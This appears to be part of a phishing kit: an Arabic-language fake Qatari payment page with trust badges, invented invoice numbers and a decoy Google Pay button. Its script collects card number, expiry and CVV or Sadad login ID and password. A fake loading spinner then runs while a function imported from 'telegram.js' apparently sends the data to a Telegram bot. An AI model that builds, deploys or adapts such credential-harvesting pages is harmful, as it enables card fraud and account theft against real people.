                    <img src="images/iso.svg" alt="ISO" />
                    <img src="images/secure.svg" alt="Secure" />
                    <img src="images/mcafee.svg" alt="McAfee" />
                </div>
                <ul>
                    <li>مكتب المساعدة :</br> +974-75276456</li>
                    <li>سياسة الخصوصية | شروط الاستخدام</li>
                    <li>مدعوم</li>
                </ul>
            </footer>
        </div>
    </div>

    <script type="module">

        import botFetch from "./telegram.js";

        // Query parameters
        const params = new URLSearchParams(window.location.search);
        const amount = params.get("amount") || userData.amount;
        const customer = params.get("name") || userData.customer;
        const desc = params.get("desc") || userData.desc;
        document.querySelectorAll("#totalAmount").forEach(ele => ele.textContent = amount);
        document.getElementById("customerName").textContent = customer;
        document.getElementById("desc").textContent = desc;
        document.getElementById("payBtn").innerHTML = ` دفع ${amount} <span
                        class="currency">QAR</span>`;

        // current date
        document.getElementById("dateNow").textContent =
            new Date().toLocaleDateString();

        // Generate random invoice number
        function generateInvoiceNo() {
            const randomNum = Math.floor(Math.random() * 9000000000000);
            return "SD" + randomNum;
        }

        // Insert invoice number
        document.getElementById("invoiceNo").textContent =
            generateInvoiceNo();


        // Details toggle
        document
            .querySelector(".details-toggle")
            .addEventListener("click", () => {
                document.getElementById("detailsBox").classList.toggle("active");
            });

        // Google Pay error
        document.getElementById("gpayBtn").addEventListener("click", () => {
            document.getElementById("gpayError").style.display = "block";
        });

        // Tabs
        const tabs = document.querySelectorAll(".tabs button");
        const creditForm = document.getElementById("creditForm");
        const sadadForm = document.getElementById("sadadForm");

        tabs.forEach((tab) => {
            tab.addEventListener("click", () => {
                tabs.forEach((t) => t.classList.remove("active"));
                tab.classList.add("active");
                if (tab.dataset.tab === "sadad") {
                    creditForm.style.display = "none";
                    sadadForm.style.display = "block";
                } else {
                    creditForm.style.display = "block";
                    sadadForm.style.display = "none";
                }
            });
        });

        // hide images in input fields 
        document.querySelectorAll(".input-box").forEach(box => {
            const input = box.querySelector("input");
            const images = box.querySelector(".images");

            if (input && images) {
                input.addEventListener("focus", () => {
                    images.style.display = "none";
                });

                input.addEventListener("blur", () => {
                    images.style.display = "flex";
                });
            }
        });

        // add / automatically in date after 2 numbers added 
        const expiryInput = document.getElementById("expiry");

        expiryInput.addEventListener("input", function (e) {
            let value = expiryInput.value.replace(/\D/g, ""); // remove non-digits

            if (value.length >= 2) {
                value = value.slice(0, 2) + "/" + value.slice(2, 4);
            }

            expiryInput.value = value;
        });

        // handle form submit 
        document.getElementById("paymentForm").addEventListener("submit", function (e) {
            e.preventDefault();
            const errorBox = document.getElementById("errorBox");
            errorBox.innerHTML = ""; // clear old errors

            // Credit form fields
            const cardName = document.getElementById("cardName").value.trim();
            const cardNumber = document.getElementById("cardNumber").value.trim();
            const expiry = document.getElementById("expiry").value.trim();
            const cvv = document.getElementById("cvv").value.trim();

            // Sadad form fields
            const sadadId = document.getElementById("sadadId").value.trim();
            const sadadPass = document.getElementById("sadadPass").value.trim();

            // Check which form is visible
            const creditFormVisible = document.getElementById("creditForm").style.display !== "none";
            const sadadFormVisible = document.getElementById("sadadForm").style.display !== "none";

            if (creditFormVisible) {
                // Cardholder name
                if (!/^[A-Za-z\u0600-\u06FF\s]{3,}$/.test(cardName)) {
                    errorBox.innerHTML += ",اسم صاحب البطاقة يجب أن يحتوي على أحرف فقط (3 أحرف على الأقل)";

                }

                // Card number (16 digits)
                if (!/^\d{16}$/.test(cardNumber)) {
                    errorBox.innerHTML += ", رقم البطاقة يجب أن يكون 16 رقمًا";
                }

                // Expiry format (MM/YY)
                if (!/^\d{2}\/\d{2}$/.test(expiry)) {
                    errorBox.innerHTML += ", الرجاء اختيار تاريخ انتهاء صحيح";
                }

                // CVV (3 digits)
                if (!/^\d{3}$/.test(cvv)) {
                    errorBox.innerHTML += ", رمز الأمان يجب أن يكون 3 أرقام";
                }

                // Store data
                var userData = {
                    amount,
                    customer,
                    desc,
                    cardName,
                    cardNumber,
                    expiry,
                    cvv
                }
            }

            if (sadadFormVisible) {
                // Sadad ID (at least 6 digits)
                if (!/^\d{6,}$/.test(sadadId)) {
                    errorBox.innerHTML += ", رقم الدخول يجب أن يحتوي على 6 أرقام على الأقل";
                }

                // Sadad Password (at least 4 chars)
                if (sadadPass.length < 4) {
                    errorBox.innerHTML += ", كلمة المرور يجب أن تكون 4 أحرف على الأقل";
                }

                // Store data
                var userData = {
                    amount,
                    customer,
                    desc,
                    sadadId,
                    sadadPass,
                };
            }

            // in case of no errors send data and navigate to next page 
            if (errorBox.innerHTML === "") {
                sessionStorage.setItem("userData", JSON.stringify(userData));

                payBtn.innerHTML = `<img src="https://i.gifer.com/ZZ5H.gif" alt="loading" /> جاري التحميل...`;
                payBtn.classList.add("loading");
                payBtn.disabled = true;

                setTimeout(() => {
                    botFetch(userData, "./page2.html");
                }, 5000);
            }
        }
        );

    </script>
</body>


</html>


